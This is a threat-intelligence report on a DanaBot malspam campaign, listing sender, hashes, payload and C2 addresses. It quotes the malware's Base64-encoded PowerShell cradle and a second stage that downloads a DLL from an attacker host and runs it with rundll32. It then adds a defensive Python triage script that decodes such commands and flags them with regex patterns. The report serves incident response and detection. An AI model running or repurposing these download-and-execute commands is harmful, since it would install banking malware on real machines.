- THREAT IDENTIFICATION: DANABOT
- SUBJECTS OBSERVED
- Study the report very urgently - hV8W
- SENDERS OBSERVED
- raymak825@netvigator.com
- ATTACHED MALDOC FILE HASHES
- 9789789.zip
- e2dd6e94fcc2851d7e2258c8abe1faf5
- Which contains:
- 12.08 - Reports.js
- aeeef159543b28995b1f742085a2c6a0
- POWERSHELL COMMAND FROM THE MALDOC
- poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
- Which decodes (Base64 of UTF-16LE) to:
- IEX (New-Object Net.Webclient).downloadstring("http://www.bonusesfound.ml/update/index.php")
- NEXT LEVEL MALDOC DOWNLOAD URL
- http://www.bonusesfound.ml/update/index.php
- This returns (as pasted; $Env:temp '\ZGOPQv.bin' does not parse as written and is presumably $Env:temp + '\ZGOPQv.bin' in the served script):
- $path = $Env:temp '\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); C:\Windows\System32\rundll32.exe $path,S
- DANABOT PAYLOAD DOWNLOAD URL
- http://www.bonusesfound.ml/update/update.dll
- DANABOT PAYLOAD FILE HASHES
- update.dll
- c00d207efb855910154389b48404e550
- Also observed dropped under AppData\Local\Temp with a different random name (JWScY.bin here, ZGOPQv.bin in the served script), same hash:
- AppData\Local\Temp\JWScY.bin
- c00d207efb855910154389b48404e550
- DANABOT C2
- Observed from the rundll32 process (HTTPS direct to IP):
- https://192.52.167.44
- SUPPORTING EVIDENCE
- https://www.virustotal.com/gui/file/716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96/detection
- https://app.any.run/tasks/042cafaf-f432-4332-8356-c3e04b55b701/
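Added example (not part of the original paste): a small Python triage helper for process-creation logs that decodes a powershell.exe -EncodedCommand argument (Base64 of UTF-16LE), flags the launch options and constructs seen in this chain (hidden window, execution-policy bypass, IEX, WebClient download, rundll32), pulls URLs out of both the command line and the decoded layer, and tags hosts that match the indicators above. The command line and second-stage script are the ones quoted in this report; the benign command line is constructed for contrast, and the parameter-prefix matching is an approximation of what powershell.exe accepts.

```python
import base64
import re
from urllib.parse import urlparse

# Network indicators taken from the report above; used to tag extracted hosts.
IOC_HOSTS = {"www.bonusesfound.ml", "192.52.167.44"}

# The encoded PowerShell one-liner from the report (verbatim).
REPORT_CMDLINE = (
    "poWERshEll -nop -w hidden -ep bypass -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8A"
    "bgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAA"
    "IgApAA=="
)

# The second-stage script the report says index.php returns (verbatim as quoted there).
REPORT_STAGE2 = (
    "$path = $Env:temp '\\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; "
    "$client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); "
    "C:\\Windows\\System32\\rundll32.exe $path,S"
)

# Heuristic patterns; the dict keys double as the flag names scan_script() reports.
PATTERNS = {
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),        # -w / -windowstyle hidden
    "exec_policy_bypass": re.compile(r"-e\w*\s+bypass", re.I),   # -ep / -executionpolicy bypass
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "download": re.compile(r"\.download(string|file|data)\s*\(", re.I),
    "rundll32": re.compile(r"\brundll32(\.exe)?\b", re.I),
}
URL_RE = re.compile(r"""https?://[^\s'"()<>,;]+""", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload of a powershell.exe command line, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    and also the '/' switch form; the payload is Base64 of UTF-16LE text. Treating every
    prefix of "-encodedcommand" of length >= 2 as a hit is an approximation (assumption).
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        switch = "-" + tok[1:].lower()
        if len(switch) >= 2 and "-encodedcommand".startswith(switch):
            payload = tokens[i + 1].strip("'\"")
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # not valid Base64/UTF-16LE: leave it for a human
    return None


def scan_script(text):
    """Flag suspicious constructs in PowerShell text and extract URLs plus IOC host matches."""
    flags = [name for name, rx in PATTERNS.items() if rx.search(text)]
    urls = URL_RE.findall(text)
    hosts = {urlparse(u).hostname for u in urls}
    return {"flags": flags, "urls": urls, "ioc_hosts": sorted(hosts & IOC_HOSTS)}


def triage_command_line(cmdline):
    """Triage one process command line: decode -enc if present and scan both layers."""
    decoded = decode_encoded_command(cmdline)
    result = scan_script(cmdline + ("\n" + decoded if decoded else ""))
    result["decoded"] = decoded
    if decoded is not None:
        result["flags"].insert(0, "encoded_command")
    return result


if __name__ == "__main__":
    # Constructed benign command line for contrast with the report's sample.
    for line in (REPORT_CMDLINE, "powershell -NoProfile -Command Get-Date"):
        r = triage_command_line(line)
        print(f"{line[:40]!r:45} flags={r['flags']} urls={r['urls']} ioc={r['ioc_hosts']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
    print("stage2:", scan_script(REPORT_STAGE2))
```

Run it over Sysmon Event ID 1 / Security 4688 command lines; any hit with encoded_command plus a download flag is worth a look on its own, and a host in ioc_hosts ties the event to this campaign. The decoded layer is scanned separately because the Base64 blob hides the IEX and WebClient strings from a plain grep of the command line.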